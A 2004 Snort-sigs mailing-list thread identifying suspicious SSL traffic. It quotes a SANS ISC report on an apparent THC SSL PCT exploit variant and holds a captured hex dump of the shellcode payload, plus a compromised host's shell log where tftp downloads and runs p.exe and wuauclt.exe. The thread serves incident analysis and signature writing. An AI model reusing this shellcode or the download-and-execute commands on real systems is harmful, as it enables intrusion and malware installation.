[Snort-sigs] do you know what is it ?

Harper, Patrick patrick.harper at ...1819...
Mon Jul 19 10:08:05 EDT 2004


I started seeing these Saturday morning


From
http://www.incidents.org/diary.php?date=2004-07-17&isc=f766f125128a81083
0df2a66315c9f1a

New Reports of Increased SSL Activity (Thanks to Chris Carboni for
adding this entry) 

We've received several reports of increased SSL activity reminiscent of
activity seen last April after the release of MS04-011. 

Preliminary analysis of Dshield data
(http://isc.sans.org/port_details.php?port=443 ) shows a sharp rise in
activity beginning at some point on 7/15 UDT. 

Data is currently being analyzed to determine if this is a re-hash of
older exploits or if this activity has been generated by either a new
exploit or a variation of older exploits. 
Notice the string "THCOWNZIIS!" in the payload. This resembles to the
THC exploit for SSL PCT that was released in April, although it may also
be a new variant. 

We have a reader reported that the following was seen on an infected
system: 

Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000
[Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]{D}{A} 
(C) Copyright 1985-2000 Microsoft Corp.{D}{A} 
{D}{A} 
C:\WINNT\system32 > {A} 
cd ..{D}{A} 
{A} 
cd ..{D}{A} 
{D}{A} 
C:\WINNT > {A} 
tftp -i xx.xx.xx.xx get p.exe{D}{A} 
{A} 
tftp -i xx.xx.xx.xx get p.exe{D}{A} 
Transfer successful: 13824 bytes in 1 second, 13824 bytes/s{D}{D}{A} 
{D}{A} 
C:\WINNT > {A} 
p.exe{D}{A} 
{A} 
p.exe{D}{A} 
{D}{A} 
C:\WINNT > {A} 
tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A} 
{A} 
tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A} 
Transfer successful: 53760 bytes in 4 seconds, 13440 bytes/s{D}{D}{A} 
{D}{A} 
C:\WINNT > {A} 
wuauclt.exe{D}{A} 
{A} 
wuauclt.exe{D}{A} 
{D}{A} 
C:\WINNT > 


If you have a system that has been compromised, please send us a note
with system configuration and patch level. 
 

-----Original Message-----
From: Erik Lalancette [mailto:elalancette at ...2614...] 
Sent: Monday, July 19, 2004 11:06 AM
To: snort-sigs at lists.sourceforge.net
Subject: [Snort-sigs] do you know what is it ?

Hi,
      I received that from someone ? 
 
0000  80 62 01 02 bd 00 01 00  01 00 16 8f 82 01 00 00
.b..............
0010  00 eb 0f 54 48 43 4f 57  4e 5a 49 49 53 21 32 5e
...THCOWNZIIS!2^
0020  be 98 eb 25 23 28 45 49  25 17 02 06 6c 59 6c 59
...%#(EI%...lYlY
0030  f8 1d 9c de 8c d1 4c 70  d4 03 58 46 57 53 32 5f
......Lp..XFWS2_
0040  33 32 2e 44 4c 4c 01 eb  05 e8 f9 ff ff ff 5d 83
32.DLL........].
0050  ed 2c 6a 30 59 64 8b 01  8b 40 0c 8b 70 1c ad 8b
.,j0Yd... at ...2639...
0060  78 08 8d 5f 3c 8b 1b 01  fb 8b 5b 78 01 fb 8b 4b
x.._<.....[x...K
0070  1c 01 f9 8b 53 24 01 fa  53 51 52 8b 5b 20 01 fb    ....S$..SQR.[
..
0080  31 c9 41 31 c0 99 8b 34  8b 01 fe ac 31 c2 d1 e2
1.A1...4....1...
0090  84 c0 75 f7 0f b6 45 09  8d 44 45 08 66 39 10 75
..u...E..DE.f9.u
00a0  e1 66 31 10 5a 58 5e 56  50 52 2b 4e 10 41 0f b7
.f1.ZX^VPR+N.A..
00b0  0c 4a 8b 04 88 01 f8 0f  b6 4d 09 89 44 8d d8 fe
.J.......M..D...
00c0  4d 09 75 be fe 4d 08 74  17 fe 4d 24 8d 5d 1a 53
M.u..M.t..M$.].S
00d0  ff d0 89 c7 6a 02 58 88  45 09 80 45 79 0c eb 82
....j.X.E..Ey...
00e0  89 ce 31 db 53 53 53 53  56 46 56 ff d0 89 c7 55
..1.SSSSVFV....U
00f0  58 66 89 30 6a 10 55 57  ff 55 e0 8d 45 88 50 ff
Xf.0j.UW.U..E.P.
0100  55 e8 55 55 ff 55 ec 8d  44 05 0c 94 53 68 2e 65
U.UU.U..D...Sh.e
0110  78 65 68 5c 63 6d 64 94  31 d2 8d 45 cc 94 57 57
xeh\cmd.1..E..WW
0120  57 53 53 fe ca 01 f2 52  94 8d 45 78 50 8d 45 88
WSS....R..ExP.E.
0130  50 b1 08 53 53 6a 10 fe  ce 52 53 53 53 55 ff 55
P..SSj...RSSSU.U
0140  f0 6a ff ff 55 e4                                   .j..U.
 
 
 




Disclaimer:
This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately. 







More information about the Snort-sigs mailing list